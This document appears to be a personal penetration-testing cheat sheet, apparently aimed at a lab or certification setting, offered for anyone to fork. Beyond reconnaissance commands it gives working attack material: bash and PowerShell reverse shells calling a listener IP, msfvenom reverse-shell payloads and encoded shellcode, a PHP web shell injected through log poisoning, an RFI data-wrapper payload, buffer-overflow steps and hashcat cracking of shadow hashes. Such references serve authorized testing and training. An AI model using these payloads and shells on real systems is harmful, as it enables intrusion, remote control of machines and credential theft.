Pentest Toolkit
This is where my cheatsheets and tools will be held. Feel free to fork and use as you wish.
Recon
Port Scanning
nmap
nmap -sn 10.10.1.0/24
network sweep to find hosts.
nmap -sn 10.10.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt
sweep network for IP's that are up, and save the IP addresses in a list.
nmap -A 10.1.1.56
for a quick scan of common TCP ports with OS and service detection.
nmap -A 10.1.1.56 -p-
to scan all TCP ports with OS and service detection.
nmap -A -sU 10.1.1.56
to scan all UDP ports with OS and service detection.
sudo nmap -O -A -sV 10.1.1.56
to scan all common TCP ports, finger print the OS, run scrips and grab banners.
Netcat
The -w
flag to specify timeout in seconds and -z
flag to send zero data (for scanning)
nc -nvv -w 1 -z 10.11.1.220 3388-3390
TCP scan from ports 3388-3390.
nc -nv -u -z -w 1 10.11.1.115 160-162
UDP scan from ports 160-162.
Directory Enumeration
dirsearch
is a favorite
dirbuster
and nikto
are classic methods
Useful wordlists on Kali
kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt rockyou.txt.gz wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery Fuzzing IOCs Miscellaneous Passwords Pattern-Matching Payloads README.md Usernames Web-Shells
kali@kali:~/Tools/dirsearch$
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r
directory enum with dirb's big.txt, copy/paste and just IP/URL and extensions.
python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r
directory enum with dirbuster's directory list, copy/paste and just IP/URL and extensions.
python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r
, brute force CGI's.
SMB Enumeration
Manual
smbclient -L 10.11.1.146
To list availble shares
smbclient //10.11.1.146/IPC$
to login to that share. If that doesn't work, try to sudo... sudo smbclient //10.11.1.146/IPC$
Automated
enum4linux 10.11.1.146 -a -o
to use enum4linux to automate smb share.
SNMP Enumeration
onesixtyone -c community -i ips
scan target network to identify SNMP servers where community and ips are lists community = (public, private, manager).
snmp-check 10.11.1.227
does everything below, but better and formats it for you nicely :)
snmpwalk -c public -v1 -t 10 10.11.1.115
enumerate entire MIB tree.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25
enumerate Windows users.
snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2
enumerate Windows running processes.
snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3
enumerate open TCP ports.
snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2
enumerate installed software.
Reverse Shells
Bash
/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1
PowerShell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Listeners
Netat
nc -lvp 4444
listen (catch) reverse shell with Netcat on port 4444
Span TTY Shell
python -c 'import pty; pty.spawn("/bin/bash")'
MSFVenom
ASP
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war
JSP
This also works for Cold Fusion instead of the crazy web shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f raw > shell.jsp
Linux Binary
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.133 LPORT=443 -f elf > shell.elf
Shell Code
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\3d"
encode bad characters, windows shell.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x00\x20" -f py -v shellcode
Linux, with python output as an option.
Privilege Escalation
Linux
sudo -l
, if there's anything interesting like running scripts as users with NOPASSWD: ALL
.
Distro Version
cat /etc/issue
Kernel Version and Architecture
uname -r
arch
Find Writable Directories
find / -writable -type d 2>/dev/null
View SUID Binaries
find / -perm -u=s -type f 2>/dev/null
Processes Running
ps axu
Check Services Listening
ss -lnpt
Cron Jobs
ls -la /etc/cron.d
prints cron jobs which are already present in cron.d
Windows
powershell -c "Invoke-WebRequest -Uri http://10.10.14.10/39719.ps1 -OutFile ./39719.ps1
File transfer for dummies
systeminfo
to get good info.
tasklist /SVC
to view running services.
Finding Kernel Exploits
Cross Compile Exploits
i686-w64-mingw32-gcc shell.c -o shell.exe
32bit Windows
i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
x86_64-w64-mingw32-gcc 271.c -o 271.exe
64bit Windows
Buffer Overflow
Bad Characters
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
Locate EIP
msf-pattern_create -l 2196
generate unique pattern to overflow the stack.
msf-pattern_offset -l 2196 -q 72433372
locate the offset of the value in EIP at crashtime.
nsf-nasm_shell (Generate Opcodes)
kali@kali: ~$ msf-nasm_shell
nasm > add eax,12
00000000 83C00C add eax,byte +0xc
nasm > JMP EAX
00000000 FFE0 jmp eax
nasm >
Web Application Exploits
LFI (Local File Inclusion)
Contaminating Log Files
Write php code to log file for executing shell commands
kali@kali:~$ nc -nv 10.11.0.22 80
(UNKNOWN) [10.11.0.22] 80 (http) open
<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
http://10.11.0.22/menu.php?file=c:\xampp\apache\logs\access.log&cmd=ipconfig
call url with LFI and GET['cmd']
RFI (Remote File Inclusion)
PHP Wrappers
http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>
to execute arbitrary php code.
Password Cracking
/etc/shadow
Hash algorithm cheat sheet bob:$1$Rrhb4lzg$Ee8/JYZjv.NimwyrSEL6R/:16903:0:99999:7:::
-
$1$ is MD5 (md5crypt) -
$2a$ is Blowfish -
$2y$ is Blowfish -
$5$ is SHA-256 -
$6$ is SHA-512
The salt is Rrhb4lzg
The hash is Ee8/JYZjv.NimwyrSEL6R/
Crack via hashcat
- Create hashfile
1$Rrhb4lzg$Ee8/JYZjv.NimwyrSEL6R/
as bob.hash - Examples
-
hashcat -m 500 -a 0 bob.hash /usr/share/wordlists/rockyou.txt --force
for$1$ -
hashcat -m 1800 -a 0 bob.hash /usr/share/wordlists/rockyou.txt --force
for$6$